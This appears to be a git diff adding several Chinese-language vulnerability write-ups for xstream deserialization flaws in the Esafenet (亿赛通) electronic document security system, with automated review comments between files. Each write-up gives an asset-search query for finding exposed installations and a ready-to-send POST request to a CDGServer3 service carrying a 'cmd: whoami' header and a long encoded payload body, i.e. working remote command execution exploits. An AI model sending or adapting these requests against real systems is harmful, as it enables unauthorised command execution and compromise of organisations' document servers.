EIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLME
IGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHB
+``` + +![1706606299203-ae668e8f-60a5-4ca7-8f77-05138f2295a5.png](./img/w2S5lXWsKhKjT4IE/1706606299203-ae668e8f-60a5-4ca7-8f77-05138f2295a5-346928.png) + + + +> 更新: 2024-04-20 22:01:32 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ayqeehnqp4bsmaey> \ No newline at end of file 
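Review bot: the request body in this 漏洞复现 block is several thousand characters of undocumented uppercase text, and its visible tail (`...PEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK` followed by the closing fence) is identical to the body of the 亿赛通 GetUsecPolicyService request added later in this patch, which points to a copy-paste error rather than a body specific to this endpoint. Suggest stating what the body encodes and how it was generated, and keeping one copy in one place if the files genuinely share it; as committed, a maintainer cannot tell from the file itself what a vulnerable response looks like beyond the screenshot and the 原文 link.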
diff --git a/亿赛通电子文档安全管理系统GetUsecPolicyService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetUsecPolicyService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..083daee --- /dev/null +++ b/亿赛通电子文档安全管理系统GetUsecPolicyService存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统GetUsecPolicyService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统GetUsecPolicyService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/f8IquKc4XSKxx-sl/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-786266.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/GetUsecPolicyService HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +
+``` + +![1706605621882-eeb0ddcd-0cb8-4671-855a-21d4a4fb772f.png](./img/f8IquKc4XSKxx-sl/1706605621882-eeb0ddcd-0cb8-4671-855a-21d4a4fb772f-515976.png) + + + +> 更新: 2024-04-20 22:01:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zm9p4olc7re48oq5> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统GetUserSafetyPolicyService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetUserSafetyPolicyService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..2888e8d --- /dev/null 
+++ b/亿赛通电子文档安全管理系统GetUserSafetyPolicyService存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统GetUserSafetyPolicyService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统GetUserSafetyPolicyService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/w4Hx6BvqW5VzinnP/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-021641.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/GetUserSafetyPolicyService HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +
NAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEG
AEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706605714878-687649e1-4cfd-4982-8c7e-ab43850d8c8a.png](./img/w4Hx6BvqW5VzinnP/1706605714878-687649e1-4cfd-4982-8c7e-ab43850d8c8a-926037.png) + + + +> 更新: 2024-04-20 22:01:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gxvve0cgqllw7pqe> \ No newline at end of file 
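Review bot: the file ends without a trailing newline (`\ No newline at end of file` at the close of the hunk); add one so later edits to the `> 更新:` / `> 原文:` footer do not show up as a rewritten last line. The reproduction block above the footer closes on a single several-kilobyte opaque encoded line with no note of what it decodes to; a defender reading this file cannot derive a detection from it, so record the distinguishing request shape in prose next to the block instead of relying on the blob alone.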
diff --git a/亿赛通电子文档安全管理系统GetValidateAuthCodeService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetValidateAuthCodeService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..367ba24 --- /dev/null +++ b/亿赛通电子文档安全管理系统GetValidateAuthCodeService存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统GetValidateAuthCodeService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统GetValidateAuthCodeService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/EYAPtwuYcTJTY55y/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-018207.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/GetValidateAuthCodeService HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +``` + +![1706605863707-aef6e36b-ee6e-4f38-b0c7-43f83ed94ff0.png](./img/EYAPtwuYcTJTY55y/1706605863707-aef6e36b-ee6e-4f38-b0c7-43f83ed94ff0-597134.png) + + + +> 更新: 2024-04-20 22:01:32 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/twt6gduy9570dygc> \ No newline at end of file 
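Review bot: the 影响版本 section lists only the product name with no affected or fixed version range, so a defender cannot triage an installation from this file; add the version information or state explicitly that it is unknown. In the reproduction request, `Host: 192.168.110.187:8090` is a concrete lab address while the sibling GetValidateLoginUserService file uses the `{hostname}` placeholder; use the placeholder here as well, and tag both fences the same way (`plain` here, `java` there) for what is identical HTTP content. The body is an opaque encoded payload of about 14 KB (`Content-Length: 14756`) with no statement of what it contains, which gives nothing to build detection on; at minimum document the observable request shape (POST to `/CDGServer3/GetValidateAuthCodeService` with `Content-Type: text/xml` and a non-standard `cmd` request header) so a WAF or IDS rule can be written from the file.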
diff --git a/亿赛通电子文档安全管理系统GetValidateLoginUserService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetValidateLoginUserService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..adb8d18 --- /dev/null +++ b/亿赛通电子文档安全管理系统GetValidateLoginUserService存在xstream反序列化漏洞.md 
@@ -0,0 +1,38 @@ +# 亿赛通电子文档安全管理系统GetValidateLoginUserService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统GetValidateLoginUserService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/Uxwzn6Zr9xGruQMB/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-297779.png) + +# 四、漏洞复现 +```java +POST /CDGServer3/GetValidateLoginUserService HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: {hostname} +cmd: whoami +Content-Length: 14756 + +
CDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPB
IHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + 